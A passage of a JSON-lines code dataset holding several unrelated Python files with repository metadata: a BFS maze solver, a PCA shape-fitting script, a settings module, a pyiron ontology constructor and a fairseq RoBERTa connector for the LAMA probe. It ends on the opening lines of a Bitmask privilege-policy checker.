queue:\n        # pop one element from the queue and print it\n        v = queue.popleft()\n        print(v, end=' ')\n        \n        # insert the unvisited elements connected to this one into the queue\n        for i in graph[v]:\n            if not visited[i]:\n                queue.append(i)\n                visited[i] = True\n    \n    \n    \n\n# 4. Maze escape (BFS)\n    \nfrom collections import deque\n\nn, m = map(int, input().split())\ngraph = []\nfor i in range(n):\n    graph.append(list(map(int, input())))\n\n# define the four movement directions: up, down, left, right \ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\n# BFS implementation\ndef bfs(x, y):\n    queue = deque()\n    queue.append((x, y))\n    \n    # repeat until the queue is empty\n    while queue:\n        x, y = queue.popleft()\n        # check the positions in the four directions from the current position\n        for i in range(4):\n            nx = x + dx[i]\n            ny = y + dy[i]\n            \n            # ignore positions outside the maze\n            if nx < 0 or ny < 0 or nx >= n or ny >= m:\n                continue\n            \n            # ignore walls\n            if graph[nx][ny] == 0:\n                continue\n            \n            # record the shortest distance only on the first visit to this node\n            if graph[nx][ny] == 1:\n                graph[nx][ny] = graph[x][y] + 1\n                queue.append((nx, ny))\n    \n    return graph[n-1][m-1] \n\nprint(bfs(0,0)) ","repo_name":"Playground-maker/PS_directory-python-","sub_path":"이코테연습/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36253413368","text":"\"\"\"\n    Jacob Kaplan\n    shape.py\n    \n    Purpose: Given a set of point coordinates in R^2, compute and output the following:\n    (a) The minimum and maximum x and y values.\n    (b) The center of mass (average) x and y values.\n    (c) The axis along which the data varies the least and the standard deviation of this variation.\n    (d) The axis along which the data varies the most and the standard deviation of that variation.\n    (e) The closest point form of the best fitting line (through the original data).\n    (f) The implicit form of the line.\n    (g) A decision about the shape that best describes the data.\n    (h) Output a matplotlib plot saved as an image containing a scatter plot of\n    the points and of the center of mass\n\n                                   *     ,MMM8&&&.            *\n                                  MMMM88&&&&&    .\n                                 MMMM88&&&&&&&\n     *                           MMM88&&&&&&&&\n                                 MMM88&&&&&&&&\n                                 'MMM88&&&&&&'\n                                   'MMM8&&&'      *\n                                 |\\___/|\n                                  )     (   .              
'\n =\\ /=\n )===( *\n / \\\n | |\n / \\\n \\ /\n _/\\_/\\_/\\__ _/_/\\_/\\_/\\_/\\_/\\_/\\_/\\_/\\_/\\_\n | | | |( ( | | | | | | | | | |\n | | | | ) ) | | | | | | | | | |\n | | | |(_( | | | | | | | | | |\n | | | | | | | | | | | | | | |\n | | | | | | | | | | | | | | |\n Sure you can take the eigenvalue of some points, but can you\n ever find the eigenvalue of your soul?\n\"\"\"\nimport sys\nimport numpy as np\nfrom numpy import linalg as la\n#import matplotlib.pyplot as plt\n\ndef xyValues(points):\n \"\"\"\n Take in array of points\n Return x values and y values of the points, respectively\n \"\"\"\n return points[:,0], points[:,1]\n\ndef eigen(points):\n \"\"\"\n Take in array of points\n Center points around the center of mass (mean)\n Create new 2xN matrix with the centered x values as the first row and\n the centered y values as the second row\n Use new 2xN matrix to create a covariance matrix\n Get eigenvalues and eigenvectors of the covariance matrix\n Return eigenvalues and eigenvectors\n \"\"\"\n N = points.shape[0]\n xVals, yVals = xyValues(points)\n xVals -= np.mean(xVals)\n yVals -= np.mean(yVals)\n stackPoints = np.stack((xVals,yVals))\n covarMatrix = np.cov(stackPoints)\n eigenvals, eigenvecs = la.eig(covarMatrix)\n eigenvals = np.sqrt(eigenvals - eigenvals/N)\n return eigenvals, eigenvecs\n\ndef getMinAxis(evals, evecs):\n \"\"\"\n Take in eigenvalues and eigenvectors of the points\n Return the first eigenvector and the second eigenvalue (these correspond\n to the minimum axis of the points)\n \"\"\"\n minAxis = evecs[0]\n sMin = evals[1]\n return minAxis, sMin\n\ndef getMaxAxis(evals, evecs):\n \"\"\"\n Take in eigenvalues and eigenvectors of the points\n Return the second eigenvector and the first eigenvalue (these correspond\n to the maximum axis of the points)\n \"\"\"\n maxAxis = evecs[1]\n sMax = evals[0]\n return maxAxis, sMax\n\ndef getClosestPoint(minAxis, xAvg, yAvg):\n \"\"\"\n Take in the info for the minimum axis, and the averages of the x and y values\n Calculate rho and p\n Return rho and p\n \"\"\"\n rho = minAxis[0] * yAvg + minAxis[1] * xAvg\n p = np.arccos(minAxis[1])\n return rho, p\n\ndef getShape(sMin, sMax, tau):\n \"\"\"\n Take in sMin, sMax, and tau\n Determine best fit and return it\n \"\"\"\n if sMin < (tau * sMax):\n return \"line\"\n else:\n return \"ellipse\"\n\ndef plot(xVals, yVals, comX, comY, a, b, c, outfig):\n \"\"\"\n Take in x and y values, the average of x and y values, the line of best fit,\n and the name of the file to save plot\n Set axes, plot x and y values, plot line of best fit, plot center of mass\n \"\"\"\n axes = plt.gca()\n axes.set_xlim([0,55])\n axes.set_ylim([0,55])\n plt.scatter(xVals, yVals)\n x = np.linspace(0,51,102)\n a = (a/b)\n c = -1*(c/b)\n y = c - a*x\n plt.plot(x, y,'-k')\n plt.plot(comX, comY, markersize=8, color=\"red\")\n plt.savefig(outfig)\n\nif __name__ == \"__main__\":\n \"\"\"\n Handle command line arguments\n \"\"\"\n if len(sys.argv) != 4:\n print(\"Correct usage: p3_shape points tau outfig\")\n sys.exit()\n else:\n pointsFile = sys.argv[1]\n tau = sys.argv[2]\n outfig = sys.argv[3]\n\n try:\n openFile = open(pointsFile, \"r\")\n except FileNotFoundError:\n print(\"No file {} found\".format(pointsFile))\n sys.exit()\n\n try:\n points = np.loadtxt(openFile, dtype=np.float64)\n except ValueError:\n print(\"Malformed points file: {}, must be numbers\".format(pointsFile))\n sys.exit()\n\n try:\n tau = float(tau)\n except ValueError:\n print(\"Tau must be number!\")\n sys.exit()\n\n \"\"\"\n Calculate and 
output stats\n \"\"\"\n xValues, yValues = xyValues(points)\n xCopy = np.copy(xValues)\n yCopy = np.copy(yValues)\n xAvg, yAvg = np.mean(xValues), np.mean(yValues)\n print(\"min: ({:.3f},{:.3f})\".format(np.min(xValues), np.min(yValues)))\n print(\"max: ({:.3f},{:.3f})\".format(np.max(xValues), np.max(yValues)))\n print(\"com: ({:.3f},{:.3f})\".format(xAvg, yAvg))\n\n eigenvals, eigenvecs = eigen(points)\n minAxis, sMin = getMinAxis(eigenvals, eigenvecs)\n maxAxis, sMax = getMaxAxis(eigenvals, eigenvecs)\n print(\"min axis: ({:.3f},{:.3f}), sd {:.3f}\".format(minAxis[1], minAxis[0], sMin))\n print(\"max axis: ({:.3f},{:.3f}), sd {:.3f}\".format(maxAxis[1], maxAxis[0], sMax))\n\n rho, theta = getClosestPoint(minAxis, xAvg, yAvg)\n a,b,c = minAxis[1], minAxis[0], -1*rho\n print(\"closest point: rho {:.3f}, theta {:.3f}\".format(rho, theta))\n print(\"implicit: a {:.3f}, b {:.3f}, c {:.3f}\".format(a,b,c))\n print(\"best as {}\".format(getShape(sMin, sMax, tau)))\n\n #plot(xCopy, yCopy, xAvg, yAvg, a, b, c, outfig)\n","repo_name":"jcolekaplan/computer_vision","sub_path":"shape/shape.py","file_name":"shape.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36737914585","text":"from pathlib import Path\nimport os\n\ntry:\n import pwd\n USER = pwd.getpwuid(os.getuid())[0]\nexcept ModuleNotFoundError as e:\n USER = os.getlogin()\n\nPROJECT_DIR = Path(os.path.dirname(os.path.abspath(__file__)))\nWWW_STORAGE = PROJECT_DIR / \"www\"\nCACHE_STORAGE = PROJECT_DIR / \"data\"\n\nPROJECT_STRUCTURE = {\n \"dirs_to_make\": [\n PROJECT_DIR,\n WWW_STORAGE,\n CACHE_STORAGE\n ],\n \"info.json\": CACHE_STORAGE / \"info.json\",\n \"list.json\": CACHE_STORAGE / \"list.json\",\n}","repo_name":"shaenr/neomayor","sub_path":"neomayor/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74683245239","text":"from __future__ import annotations\n\nfrom typing import Optional\nfrom warnings import warn\n\nimport owlready2 as owl\nimport pint\n\nfrom pyiron_ontology.workflow import NodeTree\n\nUREG = pint.UnitRegistry()\n\n\nclass Constructor:\n def __init__(\n self,\n name: str,\n closed: bool = True,\n strict: bool = False,\n debug: int = 0,\n ):\n onto = owl.get_ontology(f\"file://{name}.owl\")\n self.onto = onto\n self._make_universal_declarations()\n self._make_specific_declarations()\n # TODO: Introduce a \"from_csv\" option for constructing, and leverage\n # `all_classes=False` in `declare_classes`?\n self.sync(closed=closed, strict=strict, debug=debug)\n\n def sync(\n self,\n closed=True,\n infer_property_values=True,\n infer_data_property_values=True,\n debug=0,\n strict=True,\n ):\n if closed:\n owl.close_world(self.onto.PyObject)\n with self.onto:\n owl.sync_reasoner_pellet(\n infer_property_values=infer_property_values,\n infer_data_property_values=infer_data_property_values,\n debug=debug,\n )\n inconsistent = list(self.onto.inconsistent_classes())\n if len(inconsistent) > 0:\n msg = f\"Inconsistent classes were found in the ontology: {inconsistent}\"\n if strict:\n raise RuntimeError(msg)\n else:\n warn(msg)\n\n def save(self):\n self.onto.save()\n\n def _make_specific_declarations(self):\n pass\n\n def _make_universal_declarations(self):\n with self.onto:\n\n class PyironOntoThing(owl.Thing):\n def get_sources(\n self, additional_requirements: list[Generic] = None\n ) -> 
list[WorkflowThing]:\n raise NotImplementedError\n\n def get_source_tree(self, additional_requirements=None):\n return build_tree(\n self, additional_requirements=additional_requirements\n )\n\n def get_source_path(self, *path_indices: int):\n return build_path(self, *path_indices)\n\n class Parameter(PyironOntoThing):\n def unit_conversion(self, other_unit: str) -> float:\n if self.unit is not None:\n return UREG(self.unit).to(other_unit).magnitude\n else:\n raise ValueError(\"Parameters must have a unit specified\")\n\n class has_unit(Parameter >> str, owl.FunctionalProperty):\n class_property_type = [\"some\"]\n python_name = \"unit\"\n\n class Generic(Parameter):\n def get_sources(\n self, additional_requirements: list[Generic] = None\n ) -> list[Output]:\n return [\n out\n for out in self.indirect_outputs\n if (\n out.satisfies(additional_requirements)\n if additional_requirements is not None\n else True\n )\n ]\n\n @staticmethod\n def only_get_thing_classes(things):\n return [\n is_a_class\n for is_a_class in things\n if isinstance(is_a_class, owl.ThingClass)\n ]\n\n @property\n def indirect_things(self):\n return self.only_get_thing_classes(self.INDIRECT_is_a)\n\n @property\n def indirect_io(self) -> list[Parameter]:\n generic_classes = self.only_get_thing_classes(self.is_a)\n unique_instances = list(\n set(generic_classes[0].instances()).union(\n *[gc.instances() for gc in generic_classes[1:]]\n )\n )\n return [p for ui in unique_instances for p in ui.parameters]\n\n @property\n def indirect_outputs(self) -> list[Output]:\n return [p for p in self.indirect_io if Output in p.is_a]\n\n @property\n def indirect_disjoints_set(self) -> set[Generic]:\n return get_disjoints_set(self.indirect_things)\n\n @property\n def representation_info(self):\n \"\"\"\n A more computationally efficient call when you know you need both\n the `indirect_disjoints` _and_ `indirect_things` properties at once.\n\n Returns:\n list, set: indirect things, indirect disjoints\n \"\"\"\n indirect_things = self.indirect_things\n indirect_disjoints = get_disjoints_set(indirect_things)\n return indirect_things, indirect_disjoints\n\n @classmethod\n def class_is_indirectly_disjoint_with(cls, other: owl.ThingClass):\n ancestors1 = list(cls.ancestors())\n ancestors2 = list(other.ancestors())\n combined_disjoints = get_disjoints_set(ancestors1).union(\n get_disjoints_set(ancestors2)\n )\n combined_ancestors = set(ancestors1).union(ancestors2)\n return len(combined_disjoints.intersection(combined_ancestors)) > 0\n\n def has_a_representation_among_others(self, others_info):\n my_things, my_disjoints = self.representation_info\n return any(\n compatible_classes(\n my_things,\n my_disjoints,\n other_things,\n other_disjoints,\n )\n for (other_things, other_disjoints) in others_info\n )\n\n class WorkflowThing(PyironOntoThing):\n pass\n\n class Function(WorkflowThing):\n def get_sources(\n self, additional_requirements: list[Generic] = None\n ) -> list[Input]:\n return self.mandatory_inputs\n\n @property\n def inputs(self):\n return self.mandatory_inputs + self.optional_inputs\n\n @property\n def options(self):\n return [\n opt\n for inp in self.inputs\n for opt in [inp.generic]\n + inp.requirements\n + inp.transitive_requirements\n ]\n\n class IO(Parameter, WorkflowThing):\n pass\n\n class has_generic(IO >> Generic, owl.FunctionalProperty):\n python_name = \"generic\"\n\n class has_for_parameter(Generic >> IO, owl.InverseFunctionalProperty):\n python_name = \"parameters\"\n inverse_property = has_generic\n\n class 
has_hdf_path(IO >> str, owl.FunctionalProperty):\n python_name = \"hdf_path\"\n\n class Output(IO):\n def get_sources(\n self, additional_requirements: list[Generic] = None\n ) -> list[Function]:\n return [self.output_of]\n\n @property\n def options(self):\n return self.output_of.options\n\n def satisfies(self, requirements: list[Generic]) -> bool:\n others_info = [\n other.representation_info\n for other in self.options + [self.generic]\n ]\n return all(\n requirement.has_a_representation_among_others(others_info)\n for requirement in requirements\n )\n\n class is_output_of(Output >> Function, owl.FunctionalProperty):\n python_name = \"output_of\"\n\n class has_for_output(Function >> Output, owl.InverseFunctionalProperty):\n python_name = \"outputs\"\n inverse_property = is_output_of\n\n class Input(IO):\n def get_sources(\n self, additional_requirements: Optional[list[Generic]] = None\n ) -> list[Output]:\n return self.get_sources_and_passed_requirements(\n additional_requirements=additional_requirements\n )[0]\n\n def get_sources_and_passed_requirements(\n self, additional_requirements: Optional[list[Generic]] = None\n ) -> tuple[list[Output], list[Generic]]:\n requirements = self.get_requirements(\n additional_requirements=additional_requirements\n )\n sources = self.generic.get_sources(\n additional_requirements=requirements\n )\n return sources, requirements\n\n def get_requirements(self, additional_requirements=None):\n \"\"\"\n For each additional requirement, see if it is as or more specific\n than an existing requirement (from among the generic class,\n requirements, and transitive requirements), and if so keep it\n (discarding the original if in the generic class or requirements,\n appending if it's a transitive requirement that we're actually\n receiving).\n \"\"\"\n if additional_requirements is None:\n return [self.generic] + self.requirements\n requirements = [self.generic] + self.requirements\n\n base_infos = [other.representation_info for other in requirements]\n transitive_infos = [\n other.representation_info\n for other in self.transitive_requirements\n ]\n\n for add_req in additional_requirements:\n add_things, add_disjoints = add_req.representation_info\n used = False # For early breaking if we use the additional req\n for i, (base_things, base_disjoints) in enumerate(base_infos):\n if self.candidate_is_as_or_more_specific_than(\n add_things, base_disjoints, base_things\n ):\n requirements[i] = add_req # Overwrite the thing you're\n # more specific than\n used = True\n break\n if used:\n continue\n\n for trans_things, trans_disjoints in transitive_infos:\n # If you haven't found the additional requirement yet,\n # check if it's in the allowed transitive requirements\n if compatible_classes(\n add_things,\n add_disjoints,\n trans_things,\n trans_disjoints,\n ):\n requirements.append(add_req)\n break\n return requirements\n\n @staticmethod\n def candidate_is_as_or_more_specific_than(\n candidate_things, ref_disjoints, ref_things\n ) -> bool:\n not_disjoint = (\n len(ref_disjoints.intersection(candidate_things)) == 0\n )\n return not_disjoint and set(ref_things).issubset(candidate_things)\n\n class is_optional_input_of(Input >> Function, owl.FunctionalProperty):\n python_name = \"optional_input_of\"\n\n class has_for_optional_input(\n Function >> Input, owl.InverseFunctionalProperty\n ):\n python_name = \"optional_inputs\"\n inverse_property = is_optional_input_of\n\n class is_mandatory_input_of(Input >> Function, owl.FunctionalProperty):\n python_name = 
\"mandatory_input_of\"\n\n class has_for_mandatory_input(\n Function >> Input, owl.InverseFunctionalProperty\n ):\n python_name = \"mandatory_inputs\"\n inverse_property = is_mandatory_input_of\n\n class has_for_requirement(Input >> Generic):\n python_name = \"requirements\"\n\n class is_requirement_of(Generic >> Input):\n python_name = \"requirement_of\"\n inverse_property = has_for_requirement\n\n class has_for_transitive_requirement(Input >> Generic):\n python_name = \"transitive_requirements\"\n\n class is_transitive_requirement_of(Generic >> Input):\n python_name = \"transitive_requirement_of\"\n inverse_property = has_for_transitive_requirement\n\n owl.AllDisjoint([is_optional_input_of, is_mandatory_input_of])\n owl.AllDisjoint([Input, Function, Output, Generic])\n\n def compatible_classes(\n things1: list[owl.ThingClass],\n disjoints1: set[owl.ThingClass],\n things2: list[owl.ThingClass],\n disjoints2: set[owl.ThingClass],\n ):\n \"\"\"\n Given the `is_a` and disjoint classes of two individuals, checks whether\n they are compatible -- i.e. whether the classes of one are in the disjoints\n of the other (which would lead to incompatibility).\n\n Args:\n things1 (list[owl.ThingClass]): Classes of the first indivual.\n disjoints1 (set[owl.ThingClass]): Disjoints of the first individual.\n things2 (list[owl.ThingClass]): Classes of the second individual.\n disjoints2 (set[owl.ThingClass]):\n\n Returns:\n (bool): Whether any classes of one individual are in the disjoints of\n the other.\n \"\"\"\n # Put 0 first so we can skip the second evaluation when the first fails\n return (\n 0\n == len(disjoints1.intersection(things2))\n == len(disjoints2.intersection(things1))\n )\n\n def get_disjoints_set(classes: list[owl.ThingClass]):\n \"\"\"\n For a list of things, get the set of all the things they're disjoint\n to\n \"\"\"\n disjoints = []\n for thing in classes:\n if thing == owl.Thing:\n continue\n try:\n entities = list(next(thing.disjoints()).entities)\n # The entities are the actual classes that are disjoint\n # The entities for each of the disjoints are ideantical,\n # so we can just use `next` to grab the first one\n entities.remove(thing)\n # The entities of our disjoint include us, so remove us\n disjoints += entities\n except StopIteration:\n # If the disjoints are empty, just continue\n continue\n return set(disjoints)\n\n def build_tree(\n parameter, parent=None, additional_requirements=None\n ) -> NodeTree:\n node = NodeTree(parameter, parent=parent)\n\n if isinstance(parameter, Input):\n (\n sources,\n additional_requirements,\n ) = parameter.get_sources_and_passed_requirements(\n additional_requirements=additional_requirements\n ) # Snag the accepted transitive requirements as well\n else:\n sources = parameter.get_sources(\n additional_requirements=additional_requirements\n )\n\n for source in sources:\n build_tree(\n source, parent=node, additional_requirements=additional_requirements\n )\n\n return node\n\n def build_path(\n parameter, *path_indices: int, parent=None, additional_requirements=None\n ):\n node = NodeTree(parameter, parent=parent)\n\n sources = parameter.get_sources(\n additional_requirements=additional_requirements\n )\n\n if len(path_indices) > 0:\n i, path_indices = path_indices[0], path_indices[1:]\n source = sources[i]\n _, sources = build_path(\n source,\n *path_indices,\n parent=node,\n additional_requirements=additional_requirements,\n )\n\n return node, 
sources\n","repo_name":"pyiron/pyiron_ontology","sub_path":"pyiron_ontology/constructor.py","file_name":"constructor.py","file_ext":"py","file_size_in_byte":17378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4586886638","text":"from fairseq.models.roberta import RobertaModel\nfrom fairseq import utils\nimport torch\nfrom pytorch_pretrained_bert import BertTokenizer\nfrom lama.modules.base_connector import *\nfrom lama.modules.bert_connector import CustomBaseTokenizer\n\n\nclass RobertaVocab(object):\n def __init__(self, roberta):\n self.roberta = roberta\n\n def __getitem__(self, arg):\n value = \"\"\n try:\n predicted_token_bpe = self.roberta.task.source_dictionary.string([arg])\n if (\n predicted_token_bpe.strip() == ROBERTA_MASK\n or predicted_token_bpe.strip() == ROBERTA_START_SENTENCE\n ):\n value = predicted_token_bpe.strip()\n else:\n value = self.roberta.bpe.decode(str(predicted_token_bpe)).strip()\n except Exception as e:\n print(arg)\n print(predicted_token_bpe)\n print(value)\n print(\"Exception {} for input {}\".format(e, arg))\n return value\n\n\nclass Roberta(Base_Connector):\n def __init__(self, args):\n super().__init__()\n roberta_model_dir = args.roberta_model_dir\n roberta_model_name = args.roberta_model_name\n roberta_vocab_name = args.roberta_vocab_name\n self.dict_file = \"{}/{}\".format(roberta_model_dir, roberta_vocab_name)\n self.model = RobertaModel.from_pretrained(\n roberta_model_dir, checkpoint_file=roberta_model_name\n )\n\n self.bpe = self.model.bpe\n self.task = self.model.task\n self._build_vocab()\n self._init_inverse_vocab()\n self.max_sentence_length = args.max_sentence_length\n\n # CD: Add custom tokenizer to avoid splitting the ['MASK'] token\n # self.tokenizer = BertTokenizer.from_pretrained(dict_file)\n # custom_basic_tokenizer = CustomBaseTokenizer(do_lower_case = do_lower_case)\n # self.tokenizer.basic_tokenizer = custom_basic_tokenizer\n\n def _cuda(self):\n self.model.cuda()\n\n def _build_vocab(self):\n self.vocab = []\n for key in range(ROBERTA_VOCAB_SIZE):\n predicted_token_bpe = self.task.source_dictionary.string([key])\n try:\n value = self.bpe.decode(predicted_token_bpe)\n\n if value[0] == \" \": # if the token starts with a whitespace\n value = value.strip()\n else:\n # this is subword information\n value = \"_{}_\".format(value)\n\n if value in self.vocab:\n # print(\"WARNING: token '{}' is already in the vocab\".format(value))\n value = \"{}_{}\".format(value, key)\n\n self.vocab.append(value)\n\n except Exception as e:\n self.vocab.append(predicted_token_bpe.strip())\n\n def get_id(self, input_string):\n # Roberta predicts ' London' and not 'London'\n string = \" \" + str(input_string).strip()\n text_spans_bpe = self.bpe.encode(string.rstrip())\n tokens = self.task.source_dictionary.encode_line(\n text_spans_bpe, append_eos=False\n )\n return tokens.long()\n\n def get_batch_generation(self, sentences_list, logger=None, try_cuda=True):\n if not sentences_list:\n return None\n if try_cuda:\n self.try_cuda()\n\n tensor_list = []\n masked_indices_list = []\n max_len = 0\n output_tokens_list = []\n for masked_inputs_list in sentences_list:\n\n tokens_list = []\n\n for idx, masked_input in enumerate(masked_inputs_list):\n\n # 2. 
sobstitute [MASK] with \n masked_input = masked_input.replace(MASK, ROBERTA_MASK)\n\n text_spans = masked_input.split(ROBERTA_MASK)\n text_spans_bpe = (\n (\" {0} \".format(ROBERTA_MASK))\n .join(\n [\n self.bpe.encode(text_span.rstrip())\n for text_span in text_spans\n ]\n )\n .strip()\n )\n\n prefix = \"\"\n if idx == 0:\n prefix = ROBERTA_START_SENTENCE\n\n tokens_list.append(\n self.task.source_dictionary.encode_line(\n prefix + \" \" + text_spans_bpe, append_eos=True\n )\n )\n\n tokens = torch.cat(tokens_list)[: self.max_sentence_length]\n output_tokens_list.append(tokens.long().cpu().numpy())\n\n if len(tokens) > max_len:\n max_len = len(tokens)\n tensor_list.append(tokens)\n masked_index = (tokens == self.task.mask_idx).nonzero().numpy()\n for x in masked_index:\n masked_indices_list.append([x[0]])\n\n pad_id = self.task.source_dictionary.pad()\n tokens_list = []\n for tokens in tensor_list:\n pad_lenght = max_len - len(tokens)\n if pad_lenght > 0:\n pad_tensor = torch.full([pad_lenght], pad_id, dtype=torch.int)\n tokens = torch.cat((tokens, pad_tensor))\n tokens_list.append(tokens)\n\n batch_tokens = torch.stack(tokens_list)\n\n with torch.no_grad():\n # with utils.eval(self.model.model):\n self.model.eval()\n self.model.model.eval()\n log_probs, extra = self.model.model(\n batch_tokens.long().to(device=self._model_device),\n features_only=False,\n return_all_hiddens=False,\n )\n\n return log_probs.cpu(), output_tokens_list, masked_indices_list\n\n def __get_input_tensors(self, sentences):\n\n if len(sentences) > 2:\n print(sentences)\n raise ValueError(\"BERT accepts maximum two sentences in input for each data point\")\n\n first_tokenized_sentence = self.tokenizer.tokenize(sentences[0])\n first_segment_id = np.zeros(len(first_tokenized_sentence), dtype=int).tolist()\n\n # add [SEP] token at the end\n first_tokenized_sentence.append(BERT_SEP)\n first_segment_id.append(0)\n\n if len(sentences)>1 :\n second_tokenized_sentece = self.tokenizer.tokenize(sentences[1])\n second_segment_id = np.full(len(second_tokenized_sentece),1, dtype=int).tolist()\n\n # add [SEP] token at the end\n second_tokenized_sentece.append(BERT_SEP)\n second_segment_id.append(1)\n\n tokenized_text = first_tokenized_sentence + second_tokenized_sentece\n segments_ids = first_segment_id + second_segment_id\n else:\n tokenized_text = first_tokenized_sentence\n segments_ids = first_segment_id\n\n # add [CLS] token at the beginning\n tokenized_text.insert(0,BERT_CLS)\n segments_ids.insert(0,0)\n\n # look for masked indices\n masked_indices = []\n for i in range(len(tokenized_text)):\n token = tokenized_text[i]\n if token == MASK:\n masked_indices.append(i)\n\n indexed_tokens = self.tokenizer.convert_tokens_to_ids(tokenized_text)\n\n # Convert inputs to PyTorch tensors\n tokens_tensor = torch.tensor([indexed_tokens])\n segments_tensors = torch.tensor([segments_ids])\n\n return tokens_tensor, segments_tensors, masked_indices, tokenized_text\n\n\n def __get_input_tensors_batch(self, sentences_list):\n tokens_tensors_list = []\n segments_tensors_list = []\n masked_indices_list = []\n tokenized_text_list = []\n max_tokens = 0\n for sentences in sentences_list:\n tokens_tensor, segments_tensor, masked_indices, tokenized_text = self.__get_input_tensors(sentences)\n tokens_tensors_list.append(tokens_tensor)\n segments_tensors_list.append(segments_tensor)\n masked_indices_list.append(masked_indices)\n tokenized_text_list.append(tokenized_text)\n # assert(tokens_tensor.shape[1] == segments_tensor.shape[1])\n if 
(tokens_tensor.shape[1] > max_tokens):\n max_tokens = tokens_tensor.shape[1]\n # print(\"MAX_TOKENS: {}\".format(max_tokens))\n # apply padding and concatenate tensors\n # use [PAD] for tokens and 0 for segments\n final_tokens_tensor = None\n final_segments_tensor = None\n final_attention_mask = None\n for tokens_tensor, segments_tensor in zip(tokens_tensors_list, segments_tensors_list):\n dim_tensor = tokens_tensor.shape[1]\n pad_lenght = max_tokens - dim_tensor\n attention_tensor = torch.full([1,dim_tensor], 1, dtype= torch.long)\n if pad_lenght>0:\n pad_1 = torch.full([1,pad_lenght], self.pad_id, dtype= torch.long)\n pad_2 = torch.full([1,pad_lenght], 0, dtype= torch.long)\n attention_pad = torch.full([1,pad_lenght], 0, dtype= torch.long)\n tokens_tensor = torch.cat((tokens_tensor,pad_1), dim=1)\n segments_tensor = torch.cat((segments_tensor,pad_2), dim=1)\n attention_tensor = torch.cat((attention_tensor,attention_pad), dim=1)\n if final_tokens_tensor is None:\n final_tokens_tensor = tokens_tensor\n final_segments_tensor = segments_tensor\n final_attention_mask = attention_tensor\n else:\n final_tokens_tensor = torch.cat((final_tokens_tensor,tokens_tensor), dim=0)\n final_segments_tensor = torch.cat((final_segments_tensor,segments_tensor), dim=0)\n final_attention_mask = torch.cat((final_attention_mask,attention_tensor), dim=0)\n # print(final_tokens_tensor)\n # print(final_segments_tensor)\n # print(final_attention_mask)\n # print(final_tokens_tensor.shape)\n # print(final_segments_tensor.shape)\n # print(final_attention_mask.shape)\n return final_tokens_tensor, final_segments_tensor, final_attention_mask, masked_indices_list, tokenized_text_list\n\n def get_contextual_embeddings_with_mask_indices(self, sentences_list, try_cuda=True):\n # TBA\n if not sentences_list:\n return None\n if try_cuda:\n self.try_cuda()\n\n tensor_list = []\n masked_indices_list = []\n max_len = 0\n output_tokens_list = []\n for masked_inputs_list in sentences_list:\n\n tokens_list = []\n\n for idx, masked_input in enumerate(masked_inputs_list):\n\n # 2. 
sobstitute [MASK] with \n masked_input = masked_input.replace(MASK, ROBERTA_MASK)\n\n text_spans = masked_input.split(ROBERTA_MASK)\n text_spans_bpe = (\n (\" {0} \".format(ROBERTA_MASK))\n .join(\n [\n self.bpe.encode(text_span.rstrip())\n for text_span in text_spans\n ]\n )\n .strip()\n )\n\n prefix = \"\"\n if idx == 0:\n prefix = ROBERTA_START_SENTENCE\n\n tokens_list.append(\n self.task.source_dictionary.encode_line(\n prefix + \" \" + text_spans_bpe, append_eos=True\n )\n )\n\n tokens = torch.cat(tokens_list)[: self.max_sentence_length]\n output_tokens_list.append(tokens.long().cpu().numpy())\n\n if len(tokens) > max_len:\n max_len = len(tokens)\n tensor_list.append(tokens)\n masked_index = (tokens == self.task.mask_idx).nonzero().numpy()\n for x in masked_index:\n masked_indices_list.append([x[0]])\n\n pad_id = self.task.source_dictionary.pad()\n tokens_list = []\n for tokens in tensor_list:\n pad_lenght = max_len - len(tokens)\n if pad_lenght > 0:\n pad_tensor = torch.full([pad_lenght], pad_id, dtype=torch.int)\n tokens = torch.cat((tokens, pad_tensor))\n tokens_list.append(tokens)\n\n batch_tokens = torch.stack(tokens_list)\n\n with torch.no_grad():\n # with utils.eval(self.model.model):\n self.model.eval()\n self.model.model.eval()\n log_probs, extra = self.model.model(\n batch_tokens.long().to(device=self._model_device),\n features_only=True,\n return_all_hiddens=False,\n )\n\n # return log_probs.cpu(), output_tokens_list, masked_indices_list\n return [log_probs.cpu()], None, None, masked_indices_list\n # self.get_batch_generation(sentences_list)\n\n # # assume in input 1 or 2 sentences - in general, it considers only the first 2 sentences\n # if not sentences_list:\n # return None\n # if try_cuda:\n # self.try_cuda()\n\n # tokens_tensor, segments_tensor, attention_mask_tensor, masked_indices_list, tokenized_text_list = self.__get_input_tensors_batch(sentences_list)\n\n # with torch.no_grad():\n # all_encoder_layers, _ = self.bert_model(\n # tokens_tensor.to(self._model_device),\n # segments_tensor.to(self._model_device))\n\n # all_encoder_layers = [layer.cpu() for layer in all_encoder_layers]\n\n # sentence_lengths = [len(x) for x in tokenized_text_list]\n\n # # all_encoder_layers: a list of the full sequences of encoded-hidden-states at the end\n # # of each attention block (i.e. 
12 full sequences for BERT-base, 24 for BERT-large), each\n # # encoded-hidden-state is a torch.FloatTensor of size [batch_size, sequence_length, hidden_size]\n # return all_encoder_layers, sentence_lengths, tokenized_text_list\n\n # # return None\n","repo_name":"Chandrahasd/OKGIT","sub_path":"src/lama/modules/roberta_connector.py","file_name":"roberta_connector.py","file_ext":"py","file_size_in_byte":13960,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"18048399993","text":"import commands\nimport os\nimport subprocess\nimport platform\nimport time\n\nfrom abc import ABCMeta, abstractmethod\n\nfrom leap.bitmask.config import flags\nfrom leap.bitmask.logs.utils import get_logger\nfrom leap.common.check import leap_assert\nfrom leap.common.files import which\n\nlogger = get_logger()\n\n\nclass NoPolkitAuthAgentAvailable(Exception):\n pass\n\n\nclass NoPkexecAvailable(Exception):\n pass\n\n\ndef is_missing_policy_permissions():\n \"\"\"\n Returns True if we do not have implemented a policy checker for this\n platform, or if the policy checker exists but it cannot find the\n appropriate policy mechanisms in place.\n\n :rtype: bool\n \"\"\"\n _system = platform.system()\n platform_checker = 